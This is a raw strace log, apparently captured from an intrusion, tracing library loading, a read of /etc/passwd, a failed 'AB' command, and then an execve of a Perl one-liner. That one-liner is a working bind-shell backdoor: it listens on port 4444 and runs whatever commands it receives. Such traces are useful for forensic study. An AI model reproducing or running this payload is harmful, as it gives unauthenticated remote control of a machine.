\0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

7457  07:18:51.679614 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

7457  07:18:51.679632 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d99000

7457  07:18:51.679643 mmap2(0xb7da0000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7da0000

7457  07:18:51.679660 close(1)          = 0

7457  07:18:51.679671 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7457  07:18:51.679684 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

7457  07:18:51.679698 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

7457  07:18:51.679784 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

7457  07:18:51.679801 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d81000

7457  07:18:51.679812 mmap2(0xb7d95000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7d95000

7457  07:18:51.679827 mmap2(0xb7d97000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d97000

7457  07:18:51.679841 close(1)          = 0

7457  07:18:51.679916 munmap(0xb7f27000, 29913) = 0

7457  07:18:51.679936 open("/etc/ld.so.cache", O_RDONLY) = 1

7457  07:18:51.679986 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7457  07:18:51.680002 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f27000

7457  07:18:51.680012 close(1)          = 0

7457  07:18:51.680023 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7457  07:18:51.680037 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

7457  07:18:51.680051 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

7457  07:18:51.680138 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

7457  07:18:51.680155 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d77000

7457  07:18:51.680166 mmap2(0xb7d7f000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d7f000

7457  07:18:51.680182 close(1)          = 0

7457  07:18:51.680194 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7457  07:18:51.680207 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

7457  07:18:51.680221 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

7457  07:18:51.680308 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

7457  07:18:51.680324 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d6c000

7457  07:18:51.680335 mmap2(0xb7d75000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d75000

7457  07:18:51.680351 close(1)          = 0

7457  07:18:51.680415 munmap(0xb7f27000, 29913) = 0

7457  07:18:51.680446 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

7457  07:18:51.680461 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

7457  07:18:51.680474 _llseek(1, 0, [0], SEEK_CUR) = 0

7457  07:18:51.680486 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

7457  07:18:51.680503 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f2e000

7457  07:18:51.680528 _llseek(1, 1624, [1624], SEEK_SET) = 0

7457  07:18:51.680546 munmap(0xb7f2e000, 1624) = 0

7457  07:18:51.680556 close(1)          = 0

7457  07:18:51.680584 getpgrp()         = 3831

7457  07:18:51.680594 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

7457  07:18:51.680609 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

7457  07:18:51.680625 brk(0x8101000)    = 0x8101000

7457  07:18:51.680655 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7457  07:18:51.680669 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7457  07:18:51.680684 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7457  07:18:51.680720 brk(0x8102000)    = 0x8102000

7457  07:18:51.680746 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7457  07:18:51.680765 stat64("/sbin/AB", 0xbff14568) = -1 ENOENT (No such file or directory)

7457  07:18:51.680777 stat64("/bin/AB", 0xbff14568) = -1 ENOENT (No such file or directory)

7457  07:18:51.680788 stat64("/usr/sbin/AB", 0xbff14568) = -1 ENOENT (No such file or directory)

7457  07:18:51.680799 stat64("/usr/bin/AB", 0xbff14568) = -1 ENOENT (No such file or directory)

7457  07:18:51.680812 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

7457  07:18:51.680826 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7da26f8) = 7458

7458  07:18:51.680906 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7458  07:18:51.680923 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

7458  07:18:51.680953 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

7458  07:18:51.680965 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

7458  07:18:51.680980 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7458  07:18:51.680995 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7458  07:18:51.681008 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

7458  07:18:51.681063 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

7458  07:18:51.681076 --- SIGPIPE (Broken pipe) @ 0 (0) ---

7458  07:18:51.681142 exit_group(127)   = ?

4519  07:18:51.685829 waitpid(7457,  <unfinished ...>

7457  07:18:51.696444 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7457  07:18:51.696477 --- SIGCHLD (Child exited) @ 0 (0) ---

7457  07:18:51.696490 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 7458

7457  07:18:51.696505 waitpid(-1, 0xbff141e8, WNOHANG) = -1 ECHILD (No child processes)

7457  07:18:51.696516 sigreturn()       = ? (mask now [])

7457  07:18:51.696538 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

7457  07:18:51.696552 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7457  07:18:51.696576 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

7457  07:18:51.696588 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

7457  07:18:51.696605 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7457  07:18:51.696616 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

7457  07:18:51.696648 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7457  07:18:51.696667 stat64("/sbin/perl", 0xbff14598) = -1 ENOENT (No such file or directory)

7457  07:18:51.696679 stat64("/bin/perl", 0xbff14598) = -1 ENOENT (No such file or directory)

7457  07:18:51.696690 stat64("/usr/sbin/perl", 0xbff14598) = -1 ENOENT (No such file or directory)

7457  07:18:51.696701 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

7457  07:18:51.696719 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

7457  07:18:51.696743 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

7457  07:18:51.696757 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7da26f8) = 7459

7459  07:18:51.716485 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7459  07:18:51.716524 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

7459  07:18:51.716538 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

7459  07:18:51.716550 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

7459  07:18:51.716564 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7459  07:18:51.716580 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7459  07:18:51.716592 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

7459  07:18:51.716631 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

7459  07:18:51.716717 brk(0)            = 0x8153000

7459  07:18:51.716737 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7459  07:18:51.716752 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fb9000

7459  07:18:51.716767 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

7459  07:18:51.716784 open("/etc/ld.so.cache", O_RDONLY) = 1

7459  07:18:51.716797 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7459  07:18:51.716814 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fb1000

7459  07:18:51.716824 close(1)          = 0

7459  07:18:51.716835 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7459  07:18:51.716850 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

7459  07:18:51.716864 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

7459  07:18:51.717011 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

7459  07:18:51.717029 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7fad000

7459  07:18:51.717041 mmap2(0xb7faf000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7faf000

7459  07:18:51.717057 close(1)          = 0

7459  07:18:51.717069 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7459  07:18:51.717082 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

7459  07:18:51.717096 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

7459  07:18:51.717182 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

7459  07:18:51.717199 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f88000

7459  07:18:51.717214 mmap2(0xb7fab000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7fab000

7459  07:18:51.717230 close(1)          = 0

7459  07:18:51.717241 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7459  07:18:51.717255 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

7459  07:18:51.717269 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

7459  07:18:51.717353 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

7459  07:18:51.717370 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f87000

7459  07:18:51.717382 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f6f000

7459  07:18:51.717393 mmap2(0xb7f83000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f83000

7459  07:18:51.717407 mmap2(0xb7f85000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f85000

7459  07:18:51.717430 close(1)          = 0

7459  07:18:51.717443 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7459  07:18:51.717484 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

7459  07:18:51.717515 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

7459  07:18:51.717601 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

